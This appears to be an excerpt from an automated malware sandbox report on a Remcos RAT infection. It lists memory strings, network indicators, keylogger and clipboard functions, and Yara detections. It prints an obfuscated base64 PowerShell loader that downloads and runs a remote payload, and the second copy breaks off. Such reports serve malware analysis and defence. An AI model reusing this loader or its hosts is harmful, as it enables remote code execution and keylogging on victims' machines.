Source: powershell.exe, 00000007.00000002.1428025398.0000025F10A92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://bbuseruploads.s3.amazonaws.com
Source: powershell.exe, 00000007.00000002.1428025398.0000025F10A72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://bitbucket.org
Source: powershell.exe, 00000007.00000002.1515951705.0000025F28EB4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.veris
Source: AddInProcess32.exe, 0000000F.00000002.2555071529.0000000001196000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 0000000F.00000002.2555071529.00000000011CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gp
Source: powershell.exe, 00000007.00000002.1478940778.0000025F20450000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1478940778.0000025F206D9000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gp/C
Source: AddInProcess32.exe, 0000000F.00000002.2555071529.0000000001158000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gpSystem32
Source: AddInProcess32.exe, 0000000F.00000002.2555071529.0000000001196000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gpk
Source: AddInProcess32.exe, 0000000F.00000002.2555071529.0000000001196000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gpl
Source: powershell.exe, 00000007.00000002.1478940778.0000025F20450000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1428025398.0000025F11E38000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1373918756.0000026C410EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1356648553.0000026C32A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1373918756.0000026C41225000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000D.00000002.1356648553.0000026C328FE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000007.00000002.1428025398.0000025F10A92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://s3-w.us-east-1.amazonaws.com
Source: powershell.exe, 00000002.00000002.1540300511.0000022615AE4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1428025398.0000025F103E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1356648553.0000026C31071000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000D.00000002.1356648553.0000026C32531000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 0000000D.00000002.1356648553.0000026C328FE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.1540300511.0000022615AB8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1540300511.0000022615A9B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1428025398.0000025F103E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1356648553.0000026C31071000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000007.00000002.1428025398.0000025F10A8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1428025398.0000025F10902000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1428025398.0000025F10A92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aui-cdn.atlassian.com/
Source: powershell.exe, 00000007.00000002.1428025398.0000025F10A92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net
Source: powershell.exe, 00000007.00000002.1428025398.0000025F10A92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bbc-frontbucket-exp.prod-east.frontend.public.atl-paas.net
Source: powershell.exe, 00000007.00000002.1428025398.0000025F10A92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net
Source: powershell.exe, 00000007.00000002.1428025398.0000025F10A92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net
Source: powershell.exe, 00000007.00000002.1428025398.0000025F10A92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/
Source: powershell.exe, 00000007.00000002.1428025398.0000025F10A92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/;
Source: powershell.exe, 00000007.00000002.1428025398.0000025F10A92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bbuseruploads.s3.amazohj6
Source: powershell.exe, 00000007.00000002.1428025398.0000025F10906000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1428025398.0000025F10A92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bbuseruploads.s3.amazonaws.com
Source: powershell.exe, 00000007.00000002.1428025398.0000025F10906000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1428025398.0000025F10A92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bbuseruploads.s3.amazonaws.com/ed63b646-30bf-4545-bacd-1a1d263f75fb/downloads/6d9f1851-1729-
Source: powershell.exe, 00000007.00000002.1428025398.0000025F10603000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1428025398.0000025F10A72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bitbucket.org
Source: powershell.exe, 00000007.00000002.1428025398.0000025F10A6E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bitbucket.org/hector4576--/noviembre19/downloads/sos
Source: powershell.exe, 00000007.00000002.1428025398.0000025F10A6E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1428025398.0000025F10603000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bitbucket.org/hector4576--/noviembre19/downloads/sos19nov.txt
Source: powershell.exe, 00000007.00000002.1428025398.0000025F10A8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1428025398.0000025F10902000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1428025398.0000025F10A92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.cookielaw.org/
Source: powershell.exe, 0000000D.00000002.1373918756.0000026C41225000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000D.00000002.1373918756.0000026C41225000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000D.00000002.1373918756.0000026C41225000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000007.00000002.1428025398.0000025F10A8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1428025398.0000025F10902000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1428025398.0000025F10A92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://dz8aopenkvv6s.cloudfront.net
Source: powershell.exe, 0000000D.00000002.1356648553.0000026C328FE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000007.00000002.1428025398.0000025F1153A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 00000007.00000002.1478940778.0000025F20450000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1428025398.0000025F11E38000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1373918756.0000026C410EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1356648553.0000026C32A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1373918756.0000026C41225000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 0000000D.00000002.1356648553.0000026C32531000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneget.org
Source: powershell.exe, 0000000D.00000002.1356648553.0000026C32531000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneget.orgX
Source: powershell.exe, 00000007.00000002.1428025398.0000025F10A8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1428025398.0000025F10902000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1428025398.0000025F10A92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://remote-app-switcher.prod-east.frontend.public.atl-paas.net
Source: powershell.exe, 00000007.00000002.1428025398.0000025F10A8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1428025398.0000025F10902000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1428025398.0000025F10A92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net
Source: powershell.exe, 00000007.00000002.1428025398.0000025F10A8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1428025398.0000025F10902000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1428025398.0000025F10A92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://web-security-reports.services.atlassian.com/csp-report/bb-website

Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443

Source: unknown	HTTPS traffic detected: 185.166.143.49:443 -> 192.168.2.7:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.217.196.57:443 -> 192.168.2.7:49747 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to register a low level keyboard hook

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Code function: 15_2_004099E4 SetWindowsHookExA 0000000D,004099D0,00000000

15_2_004099E4

Installs a global keyboard hook

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Windows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Contains functionality for read data from the clipboard

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Code function: 15_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

Contains functionality to modify clipboard data

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Code function: 15_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

Contains functionality to read the clipboard data

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Code function: 15_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

Contains functionality to retrieve information about pressed keystrokes

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Code function: 15_2_00409B10 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,

15_2_00409B10

Yara detected Keylogger Generic

Source: Yara match	File source: 15.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.powershell.exe.25f20579df8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.powershell.exe.25f20579df8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.1478940778.0000025F206D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.1478940778.0000025F20450000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7104, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AddInProcess32.exe PID: 7536, type: MEMORYSTR

E-Banking Fraud

Contains functionalty to change the wallpaper

Source: Yara match	File source: 15.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.powershell.exe.25f20579df8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.powershell.exe.25f20579df8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000F.00000002.2555071529.0000000001158000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.1478940778.0000025F206D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.1478940778.0000025F20450000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7104, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AddInProcess32.exe PID: 7536, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\remcos\registros.dat, type: DROPPED

Spam, unwanted Advertisements and Ransom Demands

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Code function: 15_2_0041BB77 SystemParametersInfoW,

15_2_0041BB77

System Summary

Malicious sample detected (through community Yara rule)

Source: 15.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 15.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 15.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 7.2.powershell.exe.25f20579df8.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 7.2.powershell.exe.25f20579df8.2.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 7.2.powershell.exe.25f20579df8.2.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 15.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 15.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 15.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 7.2.powershell.exe.25f20579df8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 7.2.powershell.exe.25f20579df8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 7.2.powershell.exe.25f108182e0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects known downloader agent Author: ditekSHen
Source: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000007.00000002.1478940778.0000025F206D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000007.00000002.1478940778.0000025F20450000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: powershell.exe PID: 5896, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7104, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: powershell.exe PID: 7104, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: AddInProcess32.exe PID: 7536, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Wscript starts Powershell (via cmd or directly)

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?HI?dgBp?GM?ZQBQ?G8?aQBu?HQ?TQBh?G4?YQBn?GU?cgBd?Do?OgBT?GU?YwB1?HI?aQB0?Hk?U?By?G8?d?Bv?GM?bwBs?C??PQ?g?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?V?B5?H??ZQBd?Do?OgBU?Gw?cw?x?DI?Ow?k?EM?QwBS?Gg?bQ?g?D0?I??n?Gg?d?B0?H??Og?v?C8?OQ?x?C4?Mg?w?DI?Lg?y?DM?Mw?u?DE?Ng?5?C8?V?Bh?Gs?LwBS?GU?Zw?v?E0?YQBy?Ho?LwBE?FI?Rw?v?FI?V?BD?C8?QQBE?C8?Z?Bs?Gw?LgB0?Hg?d??n?C??Ow?k?EM?WQBy?Eo?U??g?D0?I??o?C??WwBT?Hk?cwB0?GU?bQ?u?Ek?Tw?u?F??YQB0?Gg?XQ?6?Do?RwBl?HQ?V?Bl?G0?c?BQ?GE?d?Bo?Cg?KQ?g?Cs?I??n?GQ?b?Bs?D??MQ?u?HQ?e?B0?Cc?I??p?C??OwBJ?G4?dgBv?Gs?ZQ?t?Fc?ZQBi?FI?ZQBx?HU?ZQBz?HQ?I??t?FU?UgBJ?C??J?BD?EM?UgBo?G0?I??t?E8?dQB0?EY?aQBs?GU?I??k?EM?WQBy?Eo?U??g?C0?VQBz?GU?QgBh?HM?aQBj?F??YQBy?HM?aQBu?Gc?I??7?GM?bQBk?C4?ZQB4?GU?I??v?GM?I??7?H??aQBu?Gc?I??x?DI?Nw?u?D??Lg?w?C4?MQ?g?Ds?I?Bw?G8?dwBl?HI?cwBo?GU?b?Bs?C4?ZQB4?GU?I??t?GM?bwBt?G0?YQBu?GQ?I?B7?C??J?BD?Fk?cgBK?F??I??9?C??K??g?Fs?UwB5?HM?d?Bl?G0?LgBJ?E8?LgBQ?GE?d?Bo?F0?Og?6?Ec?ZQB0?FQ?ZQBt?H??U?Bh?HQ?a??o?Ck?I??r?C??JwBk?Gw?b??w?DE?LgB0?Hg?d??n?C??KQ?g?Ds?J?Bn?Ec?aQBt?EE?I??9?C??K??g?Ec?ZQB0?C0?QwBv?G4?d?Bl?G4?d??g?C0?U?Bh?HQ?a??g?CQ?QwBZ?HI?SgBQ?C??KQ?g?Ds?I?B9?C??Ow?k?Hg?awBs?Gw?a??g?D0?I??n?D??Jw?g?Ds?J?Bi?H??dgBy?HY?I??9?C??Jw?l?Eo?awBR?GE?cwBE?GY?ZwBy?FQ?Zw?l?Cc?I??7?Fs?QgB5?HQ?ZQBb?F0?XQ?g?CQ?bQBx?G8?bgBz?C??PQ?g?Fs?cwB5?HM?d?Bl?G0?LgBD?G8?bgB2?GU?cgB0?F0?Og?6?EY?cgBv?G0?QgBh?HM?ZQ?2?DQ?UwB0?HI?aQBu?Gc?K??g?Cg?I?BH?GU?d??t?EM?bwBu?HQ?ZQBu?HQ?I??t?F??YQB0?Gg?I??k?EM?WQBy?Eo?U??g?Ck?LgBy?GU?c?Bs?GE?YwBl?Cg?Jw?k?CQ?Jw?s?Cc?QQ?n?Ck?I??p?C??OwBb?FM?eQBz?HQ?ZQBt?C4?QQBw?H??R?Bv?G0?YQBp?G4?XQ?6?Do?QwB1?HI?cgBl?G4?d?BE?G8?bQBh?Gk?bg?u?Ew?bwBh?GQ?K??k?G0?cQBv?G4?cw?p?C4?RwBl?HQ?V?B5?H??ZQ?o?Cc?V?Bl?Gg?dQBs?GM?a?Bl?HM?W?B4?Fg?e?B4?C4?QwBs?GE?cwBz?DE?Jw?p?C4?RwBl?HQ?TQBl?HQ?a?Bv?GQ?K??n?E0?cwBx?EI?SQBi?Fk?Jw?p?C4?SQBu?HY?bwBr?GU?K??k?G4?dQBs?Gw?L??g?Fs?bwBi?Go?ZQBj?HQ?WwBd?F0?I??o?C??JwBk?EE?Qg?0?EE?S?BR?EE?T?Bn?EI?MgBB?Ec?O?BB?GI?ZwBB?DU?QQBE?EU?QQBj?Hc?QgB2?EE?S?BN?EE?T?B3?EI?egBB?Ec?UQBB?Fk?UQBC?HY?QQBH?Hc?QQBi?Gc?Qg?z?EE?Rw?4?EE?WgBB?EE?dgBB?EQ?awBB?E0?UQBC?Gw?QQBI?Ek?QQBZ?Gc?QgB0?EE?RwBV?EE?YQBR?EI?MgBB?Ec?O?BB?GI?ZwBB?HY?QQBD?D??QQBM?FE?QQ?y?EE?R?Bj?EE?TgBR?EE?M?BB?Eg?SQBB?GI?dwBC?D??QQBH?E0?QQBa?FE?QgBv?EE?Qw?4?EE?WgB3?EI?eQBB?Ec?O?BB?Ew?ZwBC?D??QQBH?FU?QQBh?Hc?QgBq?EE?S?BV?EE?WQBn?EI?M?BB?Ec?awBB?Fk?ZwBB?HY?QQBD?Dg?QQBP?Gc?QgB6?EE?S?BB?EE?Z?BB?EI?M?BB?Ec?ZwBB?Cc?I??s?C??J?Bi?H??dgBy?HY?I??s?C??JwBf?F8?XwBf?F8?cwBj?HM?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?LQ?t?C0?LQ?t?C0?LQ?n?Cw?I??k?Hg?awBs?Gw?a??s?C??Jw?x?Cc?L??g?Cc?UgBv?GQ?YQ?n?C??KQ?p?C??Ow?=';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('?','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Users\user\Desktop\
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?HI?dgBp?GM?ZQBQ?G8?aQBu?HQ?TQBh?G4?YQBn?GU?cgBd?Do?OgBT?GU?YwB1?HI?aQB0?Hk?U?By?G8?d?Bv?GM?bwBs?C??PQ?g?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?V?B5?H??ZQBd?Do?OgBU?Gw?cw?x?DI?Ow?k?EM?QwBS?Gg?bQ?g?D0?I??n?Gg?d?B0?H??Og?v?C8?OQ?x?C4?Mg?w?DI?Lg?y?DM?Mw?u?DE?Ng?5?C8?V?Bh?Gs?LwBS?GU?Zw?v?E0?YQBy?Ho?LwBE?FI?Rw?v?FI?V?BD?C8?QQBE?C8?Z?Bs?Gw?LgB0?Hg?d??n?C??Ow?k?EM?WQBy?Eo?U??g?D0?I??o?C??WwBT?Hk?cwB0?GU?bQ?u?Ek?Tw?u?F??YQB0?Gg?XQ?6?Do?RwBl?HQ?V?Bl?G0?c?BQ?GE?d?Bo?Cg?KQ?g?Cs?I??n?GQ?b?Bs?D??MQ?u?HQ?e?B0?Cc?I??p?C??OwBJ?G4?dgBv?Gs?ZQ?t?Fc?ZQBi?FI?ZQBx?HU?ZQBz?HQ?I??t?FU?UgBJ?C??J?BD?EM?UgBo?G0?I??t?E8?dQB0?EY?aQBs?GU?I??k?EM?WQBy?Eo?U??g?C0?VQBz?GU?QgBh?HM?aQBj?F??YQBy?HM?aQBu?Gc?I??7?GM?bQBk?C4?ZQB4?GU?I??v?GM?I??7?H??aQBu?Gc?I??x?DI?Nw?u?D??Lg?w?C4?MQ?g?Ds?I?Bw?G8?dwBl?HI?cwBo?GU?b?Bs?C4?ZQB4?GU?I??t?GM?bwBt?G0?YQBu?GQ?I?B7?C??J?BD?Fk?cgBK?F??I??9?C??K??g?Fs?UwB5?HM?d?Bl?G0?LgBJ?E8?LgBQ?GE?d?Bo?F0?Og?6?Ec?ZQB0?FQ?ZQBt?H??U?Bh?HQ?a??o?Ck?I??r?C??JwBk?Gw?b??w?DE?LgB0?Hg?d??n?C??KQ?g?Ds?J?Bn?Ec?aQBt?EE?I??9?C??K??g?Ec?ZQB0?C0?QwBv?G4?d?Bl?G4?d??g?C0?U?Bh?HQ?a??g?CQ?QwBZ?HI?SgBQ?C??KQ?g?Ds?I?B9?C??Ow?k?Hg?awBs?Gw?a??g?D0?I??n?D??Jw?g?Ds?J?Bi?H??dgBy?HY?I??9?C??Jw?l?Eo?awBR?GE?cwBE?GY?ZwBy?FQ?Zw?l?Cc?I??7?Fs?QgB5?HQ?ZQBb?F0?XQ?g?CQ?bQBx?G8?bgBz?C??PQ?g?Fs?cwB5?HM?d?Bl?G0?LgBD?G8?bgB2?GU?cgB0?F0?Og?6?EY?cgBv?G0?QgBh?HM?ZQ?2?DQ?UwB0?HI?aQBu?Gc?K??g?Cg?I?BH?GU?d??t?EM?bwBu?HQ?ZQBu?HQ?I??t?F??YQB0?Gg?I??k?EM?WQBy?Eo?U??g?Ck?LgBy?GU?c?Bs?GE?YwBl?Cg?Jw?k?CQ?Jw?s?Cc?QQ?n?Ck?I??p?C??OwBb?FM?eQBz?HQ?ZQBt?C4?QQBw?H??R?Bv?G0?YQBp?G4?XQ?6?Do?QwB1?HI?cgBl?G4?d?BE?G8?bQBh?Gk?bg?u?Ew?bwBh?GQ?K??k?G0?cQBv?G4?cw?p?C4?RwBl?HQ?V?B5?H??ZQ?o?Cc?V?Bl?Gg?dQBs?GM?a?Bl?HM?W?B4?Fg?e?B4?C4?QwBs?GE?cwBz?DE?Jw?p?C4?RwBl?HQ?TQBl?HQ?a?Bv?GQ?K??n?E0?cwBx?EI?SQBi?Fk?Jw?p?C4?SQBu?HY?bwBr?GU?K??k?G4?dQBs?Gw?L??g?Fs?bwBi?Go?ZQBj?HQ?WwBd?F0?I??o?C??JwBk?EE?Qg?0?EE?S?BR?EE?T?Bn?EI?MgBB?Ec?O?BB?GI?ZwBB?DU?QQBE?EU?QQBj?Hc?QgB2?EE?S?BN?EE?T?B3?EI?egBB?Ec?UQBB?Fk?UQBC?HY?QQBH?Hc?QQBi?Gc?Qg?z?EE?Rw?4?EE?WgBB?EE?dgBB?EQ?awBB?E0?UQBC?Gw?QQBI?Ek?QQBZ?Gc?QgB0?EE?RwBV?EE?YQBR?EI?MgBB?Ec?O?BB?GI?ZwBB?HY?QQBD?D??QQBM?FE?QQ?y?EE?R?Bj?EE?TgBR?EE?M?BB?Eg?SQBB?GI?dwBC?D??QQBH?E0?QQBa?FE?QgBv?EE?Qw?4?EE?WgB3?EI?eQBB?Ec?O?BB?Ew?ZwBC?D??QQBH?FU?QQBh?Hc?QgBq?EE?S?BV?EE?WQBn?EI?M?BB?Ec?awBB?Fk?ZwBB?HY?QQBD?Dg?QQBP?Gc?QgB6?EE?S?BB?EE?Z?BB?EI?M?BB?Ec?ZwBB?Cc?I??s?C??J